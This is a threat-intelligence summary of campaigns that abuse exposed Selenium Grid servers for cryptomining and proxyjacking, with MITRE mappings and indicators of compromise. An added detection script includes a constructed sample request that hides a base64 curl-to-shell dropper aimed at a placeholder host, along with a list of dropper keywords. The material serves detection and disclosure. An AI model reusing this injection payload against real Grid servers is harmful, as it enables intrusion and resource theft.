From Automation to Abuse: The Rising Misuse of Selenium Grid for Cryptomining and Proxy Hijacking

Cado Security identified two campaigns abusing misconfigured, unauthenticated Selenium Grid instances to deploy a cryptominer called perfcc and to hijack proxies for proxyjacking. The campaigns use base64-encoded Python and Bash payloads delivered through Selenium WebDriver configurations, establish persistence via cron jobs, and communicate with a Tor-based infrastructure using a Domain Generation Algorithm for C2. #perfcc #SeleniumGrid

Key Points

  • Cado Security detected two campaigns targeting Selenium Grid to deploy perfcc and proxyjacking tools.
  • The attacks exploit default, unauthenticated Selenium Grid configurations.
  • Malicious scripts are delivered via WebDriver configurations and executed as part of the compromise.
  • The campaigns fetch additional payloads (including reverse shells and proxy components) from remote servers.
  • Persistence is established through cron jobs and staged file deployments in /tmp and user directories.
  • Proxy services (IPRoyal Pawns) and traffic-sharing tools (Traffmonetizer, WatchTower) are installed to monetize the compromised machines.
  • The campaigns reveal a broader pattern of misconfigurations being abused across services beyond Selenium Grid (e.g., GitHub/GitLab cases).
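The WebDriver-configuration delivery channel in the key points above lends itself to a request-level check. The following is an added defensive example, not code from the Cado Security post: it inspects a captured Selenium Grid `POST /session` body and flags a `goog:chromeOptions` block whose `binary` is an interpreter rather than a browser, or whose `args` hide a base64-encoded dropper. The sample request bodies, the interpreter list and the marker strings are constructed assumptions.

```python
import base64
import re

# Interpreters an attacker could substitute for the browser binary (assumed list, extend as needed).
INTERPRETERS = re.compile(r"(^|/)(sh|bash|dash|zsh|python[0-9.]*|perl|ruby|node)$")
# Long base64-looking runs inside a command-line argument.
B64_CHUNK = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Substrings that mark a decoded argument as a shell or Python dropper (assumed heuristics).
DROPPER_MARKERS = ("curl ", "wget ", "/tmp/", "crontab", "chmod +x", "import os", "os.system")


def _chrome_options(req):
    """Collect goog:chromeOptions from a W3C new-session body (alwaysMatch plus each firstMatch)."""
    caps = req.get("capabilities", {})
    blocks = [caps.get("alwaysMatch", {})] + list(caps.get("firstMatch", []))
    return [b["goog:chromeOptions"] for b in blocks if isinstance(b, dict) and "goog:chromeOptions" in b]


def assess_session_request(req):
    """Return findings for one captured POST /session body; an empty list means nothing suspicious."""
    findings = []
    for opts in _chrome_options(req):
        binary = opts.get("binary", "")
        if binary and INTERPRETERS.search(binary):
            findings.append(f"browser binary overridden with an interpreter: {binary}")
        for arg in opts.get("args", []):
            for blob in B64_CHUNK.findall(arg):
                try:
                    decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
                except ValueError:
                    continue
                if any(marker in decoded for marker in DROPPER_MARKERS):
                    findings.append(f"base64 argument decodes to a dropper: {decoded[:48]!r}")
    return findings


# Constructed sample requests (not from the post): the attacker-style body swaps the browser binary
# for python3 and hides a curl-to-shell dropper in a base64 argument; the host is a placeholder.
_PAYLOAD = "curl -s http://placeholder.invalid/x | sh; chmod +x /tmp/perfcc"
MALICIOUS_REQUEST = {"capabilities": {"alwaysMatch": {"browserName": "chrome", "goog:chromeOptions": {
    "binary": "/usr/bin/python3",
    "args": ["-c", "import os,base64;os.system(base64.b64decode('%s'))"
             % base64.b64encode(_PAYLOAD.encode()).decode()]}}}}
BENIGN_REQUEST = {"capabilities": {"alwaysMatch": {"browserName": "chrome", "goog:chromeOptions": {
    "args": ["--headless=new", "--disable-gpu"]}}}}

if __name__ == "__main__":
    for name, req in (("benign", BENIGN_REQUEST), ("malicious", MALICIOUS_REQUEST)):
        print(name, assess_session_request(req) or "no findings")
```

Run it against session bodies captured from the Grid router or hub logs; any non-empty result is worth triaging alongside the cron and /tmp artifacts listed above.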

MITRE Techniques

  • [T1496] Resource Hijacking – Quote: ‘Threat actors hijack system resources for cryptomining.’
  • [T1105] Ingress Tool Transfer – Quote: ‘Malicious scripts are transferred to the victim’s system.’
  • [T1059.006] Command and Scripting Interpreter: Python – Quote: ‘Python scripts are used to execute malicious commands.’
  • [T1059.004] Command and Scripting Interpreter: Unix Shell – Quote: ‘Shell commands are executed to perform malicious activities.’
  • [T1053.003] Scheduled Task: Cron – Quote: ‘Cron jobs are set up for persistence of malicious binaries.’
  • [T1574.006] Hijack Execution Flow: Dynamic Linker Hijacking – Quote: ‘Malicious binaries are injected into legitimate processes.’
  • [T1140] Deobfuscate/Decode Files or Information – Quote: ‘Base64 encoded scripts are decoded for execution.’
  • [T1070.003] Indicator Removal: Clear Command History – Quote: ‘Threat actors disable command history to avoid detection.’
  • [T1070.004] Indicator Removal: File Deletion – Quote: ‘Temporary files are deleted to remove traces of the attack.’
  • [T1027.002] Software Packing – Quote: ‘Malicious binaries are packed to evade detection.’
  • [T1568.002] Domain Generation Algorithm – Quote: ‘Dynamic domains are generated for command and control communications.’

Indicators of Compromise

  • [IP Address] C2/download infrastructure – 54.187.140.5, 173.212.220.247, 193.168.143.199, 198.211.126.180
  • [Domain] Malicious domains used for hosting payloads – www.os7mj54hx4pwvwobohhh6.com, www.xt3tiue7xxeahd5lbz.com, and 2 more items
  • [URL] Payload fetch endpoints – http://173.212.220.247/burjdubai/.jblae/y, http://173.212.220.247/burjdubai/.jblae/pl, and 1 more item
  • [Tor Node] Anonymized C2/Tor traversal – 95.216.88.55, 146.70.120.58, 50.7.74.173
  • [File Hash] Packed/operational binaries – 31ee4c9984f3c21a8144ce88980254722fd16a0724afb16408e1b6940fd599da, 22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13, and 3 more hashes
  • [File Hash] Other binaries associated with deployment – 44e83f84a5d5219e2f7c3cf1e4f02489cae81361227f46946abe4b8d8245b879, 95aa55faacc54532fdf4421d0c29ab62e082a60896d9fddc9821162c16811144, and 1 more hash
  • [File Name] Dropped payloads and scripts – perfcc, top, checklist.php, and other related components

Read more: https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking